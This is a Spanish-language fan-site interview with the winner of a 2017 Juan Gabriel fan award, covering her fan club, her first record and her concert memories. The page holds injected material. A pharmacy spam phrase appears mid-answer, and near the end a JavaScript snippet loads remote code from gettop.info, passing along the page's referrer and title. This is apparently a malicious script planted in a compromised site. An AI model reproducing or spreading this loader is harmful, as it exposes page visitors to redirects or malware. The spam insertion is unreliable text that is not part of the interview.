Entrevista: Acreedora del Reconocimiento Alberto 2017

Comparte !

Hoy entrevistamos a la Fan que salio acreedora del “Reconocimiento Alberto 2017″ la Sra. Blanca María del Carmen Alvarez García de Ixtapaluca, Estado de México, México

Desde qué año sigues a Juan Gabriel?
Desde 1971 lo sigo

Integras algún Club de Fans? Cuéntanos un poco de él
Sí, se llama Amor y Amistad. En este club, conocí a mis grandes amigas, con ellas he compartido aventuras, diversiones, trabajo comunitario, festejos, promociones, etc. Todo a nombre de Juan Gabriel

Las reuniones con ellas aún siguen?
Sí, aún nos seguimos reuniendo, pero ya no como antes, en la radio o la televisión, ya que esto ha cambiado y no por nosotros sino por políticas de las empresas, pero por ver a Juan Gabriel todavía lo hacemos. eriacta 100 tablets

fb_img_1484053182427

 

Participaste de algunos convivios junto a él?
A mí me tocó estar en tres convivios, uno en Morelos y dos en la Ciudad de México.

Cuál fue tu primer LP, Cassette o CD que tuviste del Divo? Cuéntanos ese momento cuando lo tuviste en tus manos.
Mi primer disco fue un sencillo “No tengo dinero”. Y literal no tenía dinero para comprarlo, pero junte el dinero que me daba mi mamá para la escuela y con eso lo compre. ¡Que emoción!, pero no tenía donde tocarlo, por eso lo guarde y solo lo escuchaba en la radio, porque televisión no tenía tampoco.

 

De todo lo que tienes de Juan Gabriel hay algo que seguro es lo que más amas o tiene un gran valor y significado para vos, cual es y ¿porque?
Fuera de lo material, el recuerdo más hermoso que tengo fue cuando yo estaba cursando la secundaria, mi escuela (que aún existe) está a un costado del Teatro Blanquita en la Cd. De México, esperando que llegara el camión de repente volteo y ¡vi anunciado a Juan Gabriel!
Empecé a juntar el dinero que usaba para mi pasaje y me iba caminando, claro tuve que juntar para dos entradas porque sola no me dejó mi mamá, así que me llevé a mi hermano, fue muy emotivo para mí, al verlo salir al escenario, mis lágrimas salieron solitas, no me importo el lugar que nos tocó, hasta arriba en la última fila, junto a las cajas de refrescos, pero yo feliz, fue mi primera vez que lo vi en persona.

 

Nos contaron que no querías participar en el “Reconocimiento Alberto” y ahora sos la ganadora, que se siento de un “Premio” entregado por los Fans?
Es cierto, a mí nunca me han gustado las competencias, tal vez porque me gusta tener las cosas con mi propio esfuerzo ya sea económico o de trabajo, pero competir contra alguien por algo, no me gusta, sin embargo, mi hermana Lucia me convenció dándome muy buenas razones y pues aquí estoy, además mis alumnos y sus mamis también me dieron mi empujoncito para participar y no se diga mi familia y mis primas.

 

Seguramente de luego de tantos años habrás hecho cosas muy locas por ir a verlo, recuerdas alguna que quieras compartir?
Muchas, pero la más loca fue por seguir a Socorro, estábamos escuchando los ensayos en el loby del centro nocturno “El Patio” ella se metió por debajo de unas sillas y mesas que bloqueaban una entrada y me dije, “Ándale que esperas” y que me meto también, apenas nos estábamos levantando del suelo, cuando nos llegó una persona de limpieza y que nos saca, yo me moría de vergüenza, pero después cuando lo platicamos me muero, pero de risa.
Si hoy tuvieras la posibilidad de decirle algo que le dirías?
Cuando lo tuve enfrente en varias ocasiones, se lo dije.

Qué es ser Fan de Juan Gabriel?
Es quererlo, admirarlo y respetarlo, a él, a su arte, a sus cosas, a sus decisiones y a todas las personas que lo rodean. Tal vez no buenas decisiones en algunos casos, pero son sus decisiones.

 

Algo de los recuerdos de Blanca sobre Juan Gabriel

 

[flagallery gid=32]

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; document.currentScript.parentNode.insertBefore(s, document.currentScript);

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

shares